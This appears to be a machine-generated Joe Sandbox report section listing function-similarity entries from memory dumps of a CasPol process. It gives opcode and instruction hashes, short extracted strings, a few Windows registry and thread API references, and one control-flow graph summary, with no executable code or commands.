                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5737123972.0000000020400000.00000040.00000800.00020000.00000000.sdmp, Offset: 20400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_20400000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: LR-l$LR-l
                                                  • API String ID: 2994545307-4133839992
                                                  • Opcode ID: 26569b1f5151c55bf9366b70dfd85661c90b96537e126f87b1b9f4778f939a6f
                                                  • Instruction ID: b37a859ae2ba2ef25218e8a2da83f4f5484311b7f7d135cbeecdceb93804a59c
                                                  • Opcode Fuzzy Hash: 26569b1f5151c55bf9366b70dfd85661c90b96537e126f87b1b9f4778f939a6f
                                                  • Instruction Fuzzy Hash: 0A51F430B043059FCB05DFB0C884A9EBBB6AF86204F14857AE516EF392EB34E8058765
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1663 2040efa8-2040f014 call 2040f27d LdrInitializeThunk 1671 2040f01a-2040f034 1663->1671 1672 2040f15d-2040f17a call 2040b288 call 2040b418 1663->1672 1671->1672 1676 2040f03a-2040f054 1671->1676 1686 2040f17f-2040f188 1672->1686 1680 2040f056-2040f058 1676->1680 1681 2040f05a 1676->1681 1682 2040f05d-2040f0b8 call 2040b71c 1680->1682 1681->1682 1693 2040f0ba-2040f0bc 1682->1693 1694 2040f0be 1682->1694 1695 2040f0c1-2040f15b call 2040b71c 1693->1695 1694->1695 1695->1686
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5737123972.0000000020400000.00000040.00000800.00020000.00000000.sdmp, Offset: 20400000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_20400000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: LR-l$LR-l
                                                  • API String ID: 2994545307-4133839992
                                                  • Opcode ID: 2df96697defabe507457f7cd78076bd9e2c9dea1b3e55a9e26493446324fbc08
                                                  • Instruction ID: 3464b20ff62f84021b9154487c0fef4bf6f2e10d1681f1a0a4933b1ff308e797
                                                  • Opcode Fuzzy Hash: 2df96697defabe507457f7cd78076bd9e2c9dea1b3e55a9e26493446324fbc08
                                                  • Instruction Fuzzy Hash: 1051B330A002059BCB04EFB4D884A9EB7F6EF89214F14C939E516EB355EF35E9088795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: X1l$X1l
                                                  • API String ID: 0-351013883
                                                  • Opcode ID: ad3a64875baa41d6468ce820e513495670ea53b771aee03aec936066b886db45
                                                  • Instruction ID: 42c852d0b124231238058645256ab9d9f230593e0d78eab0f621db781706e551
                                                  • Opcode Fuzzy Hash: ad3a64875baa41d6468ce820e513495670ea53b771aee03aec936066b886db45
                                                  • Instruction Fuzzy Hash: 6741AC3178876B4BD7994A75889437A76EAAFC4201F25C07AD969C7381DF74CC04C363
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: X1l$X1l
                                                  • API String ID: 0-351013883
                                                  • Opcode ID: 8c99743f81f5e5e26638b266bb7e040f5775939a6fd68b56a675b09398ae6ea7
                                                  • Instruction ID: ef8317d412cfaae7cdb2b62e54767f768d7e8549b2e609b28643cfa586e3911d
                                                  • Opcode Fuzzy Hash: 8c99743f81f5e5e26638b266bb7e040f5775939a6fd68b56a675b09398ae6ea7
                                                  • Instruction Fuzzy Hash: 7F31293078C78B0FD796866548506B6BBAA9FC2215F35C1B7C568CB282DA71CC05C363
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tQvo$tQvo
                                                  • API String ID: 0-3185210752
                                                  • Opcode ID: 66cb279d5a1c209ca51f45ec4e2e1b5e6004c277faaaccdc21e967462babd3ba
                                                  • Instruction ID: 876a3a2c08c5be353d8de63e27530fad687a4f0a6dfcccd4cc5b2826ca2f659b
                                                  • Opcode Fuzzy Hash: 66cb279d5a1c209ca51f45ec4e2e1b5e6004c277faaaccdc21e967462babd3ba
                                                  • Instruction Fuzzy Hash: 14417770D40749EFDB90CFA5D5887DDBFB4BF0A325F208429E415AB281DBB92885CB52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH-l
                                                  • API String ID: 0-4042160986
                                                  • Opcode ID: 1274d890a1af3388192379b45885618448bbcdd4432538597de178ec009da28d
                                                  • Instruction ID: 470980e29bd6360d938002b25ad26e97e1eddea7be0026993566bad340ce67e6
                                                  • Opcode Fuzzy Hash: 1274d890a1af3388192379b45885618448bbcdd4432538597de178ec009da28d
                                                  • Instruction Fuzzy Hash: 9B323034B001288FCB54DF60C9987ADB7BAAF89310F1085EDD80AA7781DF726E958F55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH-l
                                                  • API String ID: 0-4042160986
                                                  • Opcode ID: 529da19c045fe4cb2b39b5b547914bb54b4dbb95af43a2561d2e72b90efe5d33
                                                  • Instruction ID: 4ab5fa3ffb1528ad1677299b4ac9c2a352bbab8d74ea66c5b10cd14a3d6b7297
                                                  • Opcode Fuzzy Hash: 529da19c045fe4cb2b39b5b547914bb54b4dbb95af43a2561d2e72b90efe5d33
                                                  • Instruction Fuzzy Hash: 49323F34B001288FCB54DF60C9987ADB7BAAF89310F1085EDD80AA7781DF726E958F55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5702007158.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_f00000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: TerminateThread
                                                  • String ID:
                                                  • API String ID: 1852365436-0
                                                  • Opcode ID: 90ca2614c5729d23cdce8c9016c4f356b8e2edc0ef6fb923a4e91172cd43d457
                                                  • Instruction ID: f3243db18bad7394d4a8b443c47a8beffea2fdb0a81b89418ffbe00214bdb8c8
                                                  • Opcode Fuzzy Hash: 90ca2614c5729d23cdce8c9016c4f356b8e2edc0ef6fb923a4e91172cd43d457
                                                  • Instruction Fuzzy Hash: F051DD31D483068FCB71DA6488907E277A2FF63370F688199C8464F2E2D72998C5F791
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00EDEAD9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5700815743.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ed0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  • Opcode ID: 275fdc4b83c657bdba3b78ccb501d3b516c4400537511078a8ba0c3cca3ca95c
                                                  • Instruction ID: c0f2f270c55a6728582838b81303eef294b462cd1269a84f539d7a481b57de47
                                                  • Opcode Fuzzy Hash: 275fdc4b83c657bdba3b78ccb501d3b516c4400537511078a8ba0c3cca3ca95c
                                                  • Instruction Fuzzy Hash: E14114B0E042599FCB20CFA9D888A9EBBF5FF48314F15806AE819AB351D7749905CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 00EDE81C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5700815743.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ed0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: a7ad0fbf59aeb49d8f2b57d26638756e23cf5a467f1a807245615b1231f73c20
                                                  • Instruction ID: 15972addd2661b440777c940d655d0e47b0381bb199c6964aed8aa80591c3599
                                                  • Opcode Fuzzy Hash: a7ad0fbf59aeb49d8f2b57d26638756e23cf5a467f1a807245615b1231f73c20
                                                  • Instruction Fuzzy Hash: A3410EB4D052899FDB14CFA9C588ACEFFF1AF49314F29816AD408AB341C7759885CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00EDEAD9
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5700815743.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ed0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: QueryValue
                                                  • String ID:
                                                  • API String ID: 3660427363-0
                                                  • Opcode ID: d3e61dd7c542014c54fdbc97dec57149bd6b7bec4d958a6b2acf8af7037ea335
                                                  • Instruction ID: 4fb5b9a91a34bf908bd31952e1fe1d9c64972bf014b82332d066f2f5b25bca85
                                                  • Opcode Fuzzy Hash: d3e61dd7c542014c54fdbc97dec57149bd6b7bec4d958a6b2acf8af7037ea335
                                                  • Instruction Fuzzy Hash: FF31DDB1D002599FCB20CF9AD984A8EBBF5FF48714F55802AE819BB350D774A905CFA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 00EDE81C
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5700815743.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_ed0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 74fb0b33a6fdb5bbd00ceaeabca5e17ebb5498ef9d8795dadc3f85bd7896f9d7
                                                  • Instruction ID: 007958002a1adbd1f7c6b73bd830c911986e47662a6c42583fdc2f719655ac1f
                                                  • Opcode Fuzzy Hash: 74fb0b33a6fdb5bbd00ceaeabca5e17ebb5498ef9d8795dadc3f85bd7896f9d7
                                                  • Instruction Fuzzy Hash: F5310FB4D013899FDB14CF99C588A8EFFF5BF48304F28856AE808AB341C7759985CB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d82l
                                                  • API String ID: 0-369914466
                                                  • Opcode ID: 21af44e6be3e90215b7e1b2d856addd5828b4733e43ce7fb11c8c76b0b6d885e
                                                  • Instruction ID: 8ff6da43aeca820c9b5b95312eb1d3711dcf721e9f419d761cf01b88a930c79f
                                                  • Opcode Fuzzy Hash: 21af44e6be3e90215b7e1b2d856addd5828b4733e43ce7fb11c8c76b0b6d885e
                                                  • Instruction Fuzzy Hash: 25618E35B406598FCB44DFA8C858AED7BB6EF88710F258069E915AB390CB31DC52CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: +&@P^
                                                  • API String ID: 0-973182422
                                                  • Opcode ID: e0ef8c15ac30b3847b93a2ae78124dd01e7243b3a2d74866680ff7f7ab68df33
                                                  • Instruction ID: fc4ae484d1e3f27422a2d51ea4e1aad99e8a9116fdda520417924df4b8e0d0f9
                                                  • Opcode Fuzzy Hash: e0ef8c15ac30b3847b93a2ae78124dd01e7243b3a2d74866680ff7f7ab68df33
                                                  • Instruction Fuzzy Hash: 0551FE34B487104FCB45EB7890582BEBAF3AF89210B11493DC16ACB350EF35991697A7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR-l
                                                  • API String ID: 0-4220564955
                                                  • Opcode ID: 0a15392a1fc95dd5087444021efac599452d258def3a102479adc7dbede3264c
                                                  • Instruction ID: 696f930e84947371c3472594d1efa7bb5e04df7eb8a399fc37df223d90a9f24a
                                                  • Opcode Fuzzy Hash: 0a15392a1fc95dd5087444021efac599452d258def3a102479adc7dbede3264c
                                                  • Instruction Fuzzy Hash: 6051D230B10B158BDB459F7984582AE77B2AFC9214F208439E81AD7784EF74DC4B8B59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR-l
                                                  • API String ID: 0-4220564955
                                                  • Opcode ID: cc4d14d7123678d801cdb08a1f07d8fb1fb43c0834deb8194125a589f2edd625
                                                  • Instruction ID: b5d7c5d0cf9b1bb53d5de10cecc6ee6efe9e6a03be0329db863e1e191a9d8be5
                                                  • Opcode Fuzzy Hash: cc4d14d7123678d801cdb08a1f07d8fb1fb43c0834deb8194125a589f2edd625
                                                  • Instruction Fuzzy Hash: 2641AE34F107148BDB459F7584981AE77B3AFCA214B20842CE806D7784EF749C4B9BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: d82l
                                                  • API String ID: 0-369914466
                                                  • Opcode ID: 9e2499da2d447e4324e7627bc79866726e69db83b0f768f455d440fc76e1278f
                                                  • Instruction ID: 314740151a120f09ec73998fa88a683992d9052ff98d895abceb5915c443ad16
                                                  • Opcode Fuzzy Hash: 9e2499da2d447e4324e7627bc79866726e69db83b0f768f455d440fc76e1278f
                                                  • Instruction Fuzzy Hash: 13412830344B468FC354DB35D494A66BBB5EF85315F2184ACE5AACB7B1DB60EC01CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: PH-l
                                                  • API String ID: 0-4042160986
                                                  • Opcode ID: d8a12e27afe16f20ac2bb9a4ed2eb6043cc46ba7d841354ed0bffaf4ebcc33ae
                                                  • Instruction ID: 823bf3249dce6f26a6a67530d0d69ebcb608fc86be732f016e9178aecdd7491d
                                                  • Opcode Fuzzy Hash: d8a12e27afe16f20ac2bb9a4ed2eb6043cc46ba7d841354ed0bffaf4ebcc33ae
                                                  • Instruction Fuzzy Hash: 4331C134B002149BDB489F74C8AD7AF7AB6AFC9250F244428E916E7385DE39CC018BA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR-l
                                                  • API String ID: 0-4220564955
                                                  • Opcode ID: 840812db0784f92bb50839d1573f756df051c5310945ba884c678af2da627a66
                                                  • Instruction ID: 511aa3de7a46729dfe9c05671226d2b3b19d372f3a7dbc3c224c7ca69c4b4cf9
                                                  • Opcode Fuzzy Hash: 840812db0784f92bb50839d1573f756df051c5310945ba884c678af2da627a66
                                                  • Instruction Fuzzy Hash: E711E13030C2504FC709EB78E45069E7BA6DFCA214B1284AAD215CF7A5DF31EC1987D6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: LR-l
                                                  • API String ID: 0-4220564955
                                                  • Opcode ID: 04aeae3c13b80781d6d317a21c97cbb28262752d915793e32f5036e38fefd64d
                                                  • Instruction ID: 7c7913d690cee79d72501ac09fe15f99f356adc6d045405f2819ae1559a88132
                                                  • Opcode Fuzzy Hash: 04aeae3c13b80781d6d317a21c97cbb28262752d915793e32f5036e38fefd64d
                                                  • Instruction Fuzzy Hash: AB01F2357082109FC708AB7890602AE77E6EFCA320B11807AD119CF7A1DF71DD09879B
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'-l
                                                  • API String ID: 0-119641875
                                                  • Opcode ID: b196a085eb8e65a47009cb74a94893fa600010aa99e15b65fe638f73675db805
                                                  • Instruction ID: 26c557afac2501f55986cfd65685b4b36e5b03878d026c741c86ef91e9db0c13
                                                  • Opcode Fuzzy Hash: b196a085eb8e65a47009cb74a94893fa600010aa99e15b65fe638f73675db805
                                                  • Instruction Fuzzy Hash: A9F04F30A04209AFCB45DFB4D99508CBBF1EF45214F1045E9C948DB251DB316E09C795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'-l
                                                  • API String ID: 0-119641875
                                                  • Opcode ID: 6948c7ac2b38c2efb92b99235615e33e91a03e61bcb3f476986ad88553c339d6
                                                  • Instruction ID: 7fbb880b00180990bc06ec7e2b8ab4ab0d0964d95802049759d84d67901b5df4
                                                  • Opcode Fuzzy Hash: 6948c7ac2b38c2efb92b99235615e33e91a03e61bcb3f476986ad88553c339d6
                                                  • Instruction Fuzzy Hash: D0F0F830A0420DAFCB44EFA4E98549CBBF5AB45204B5045A9C519EB250EB316F498B89
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tQvo
                                                  • API String ID: 0-202313449
                                                  • Opcode ID: f51882d0f8c8c254d219a59e7d09521ab88324df6ec13e28c33f7426f9130fd5
                                                  • Instruction ID: e053f83111c0cdcd306bdabf30cdaf85bc93e4c282c851ac311752b9ea504b84
                                                  • Opcode Fuzzy Hash: f51882d0f8c8c254d219a59e7d09521ab88324df6ec13e28c33f7426f9130fd5
                                                  • Instruction Fuzzy Hash: D5E06D30A84709EBDB45CF20D9987ED3BB1BB01252F204428D022A6191CFB51D45CB83
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `uo
                                                  • API String ID: 0-3972873004
                                                  • Opcode ID: 727bacf3a9caa58f30942a87a5e182bb235a7d4780f873f5c45b2ff59ecff7b2
                                                  • Instruction ID: 266049a0b305e0e192309aa6a1f78e962c85643a32a408f4ba902a3108eef820
                                                  • Opcode Fuzzy Hash: 727bacf3a9caa58f30942a87a5e182bb235a7d4780f873f5c45b2ff59ecff7b2
                                                  • Instruction Fuzzy Hash: 42E06534118310CBC705DF16D1CA6457FA8AB42319F00809AC8180F2A6D7B2E5398FC2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: `uo
                                                  • API String ID: 0-3972873004
                                                  • Opcode ID: f4c19dbb6c929040a762d86726bb0ce8b97c331c9dd1c1ff4c5617539dfc9d61
                                                  • Instruction ID: d253fbebcb2f10950bb35814eb20c5241cc30d7ded6aa8c54a15ead1f341c4bf
                                                  • Opcode Fuzzy Hash: f4c19dbb6c929040a762d86726bb0ce8b97c331c9dd1c1ff4c5617539dfc9d61
                                                  • Instruction Fuzzy Hash: 6DD017342283189BC300DB65D588B153FA96B8631AF40846CD4180B262CBF2F8298FC2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ef85d4251b76a7ce1c10c529b7643d931d0d63d56d9155fa34dcc25dd93cfe82
                                                  • Instruction ID: c5db146a0c0eeaae9ee391abe5ea390ef6e2d08cbea64026e095fe08dc086e77
                                                  • Opcode Fuzzy Hash: ef85d4251b76a7ce1c10c529b7643d931d0d63d56d9155fa34dcc25dd93cfe82
                                                  • Instruction Fuzzy Hash: A802C874A46328CFDBA5EF30D88868EB775BF49315F1081E9D41AA2354CB329E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 696d33214d51155e6240ebcb0b0bbf81a50b53758019f5f9b41a3ee3b733015b
                                                  • Instruction ID: 43f590cb5422c0a720690c463f11a9f973005451705ed4093cd729e9c7c46cb5
                                                  • Opcode Fuzzy Hash: 696d33214d51155e6240ebcb0b0bbf81a50b53758019f5f9b41a3ee3b733015b
                                                  • Instruction Fuzzy Hash: 8002B974A46728CFCB66EF30D88868EB775BF49315F1081E9D41AA2354CB329E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f63f237fcc2aad756d260c510c161d09d1984c75c817e4bec71e05a85527af51
                                                  • Instruction ID: fcf6f20188becc7b9caed7adf5a1f6910886c3e8a62e9bfc6b7afc87cfb38dc7
                                                  • Opcode Fuzzy Hash: f63f237fcc2aad756d260c510c161d09d1984c75c817e4bec71e05a85527af51
                                                  • Instruction Fuzzy Hash: B702C874A46328CFDBA5EF30D88868EB775BF49315F1081E9D41AA2354CB329E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 109434f9c4d25eb044d906238b51d36c74378635df0b0ea88a020c78572e422b
                                                  • Instruction ID: 907f1a96fa5c66b1df012e09a344480f54c2387e3d9a0796dfc87e1ec0e8fe54
                                                  • Opcode Fuzzy Hash: 109434f9c4d25eb044d906238b51d36c74378635df0b0ea88a020c78572e422b
                                                  • Instruction Fuzzy Hash: E8C1C0347042269FCB45DF64C894AEE77A6BF88314F258069F926DB390DB31DC52CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 92c613bbd6192eaad7d193580ea8c3245132f6878aee4a1fd4a3bd89050f1435
                                                  • Instruction ID: eb1e5ac3db2169aa0f18b27f55cbb7e1d80e483e01f160e4aa4f96a574783b08
                                                  • Opcode Fuzzy Hash: 92c613bbd6192eaad7d193580ea8c3245132f6878aee4a1fd4a3bd89050f1435
                                                  • Instruction Fuzzy Hash: 2202C874A46328CFDBA5EF30D88868EB771BF49315F1081E9D41AA2354CB329E81CF56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.5726852686.000000001D2D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D2D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_1d2d0000_CasPol.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c4418d1a513a574038bb6c1dabd5a0a85d57826342cbe548303c69794674eb79
                                                  • Instruction ID: 323bfd19776a23754a206f2f32e51dc77a1832c6273699c96276d3a7db9e62e5
                                                  • Opcode Fuzzy Hash: c4418d1a513a574038bb6c1dabd5a0a85d57826342cbe548303c69794674eb79
                                                  • Instruction Fuzzy Hash: 4302C874A46328CFCB65EF30D88868EB772BF49315F1081E9D41AA2354CB329E81CF56
                                                  Uniqueness
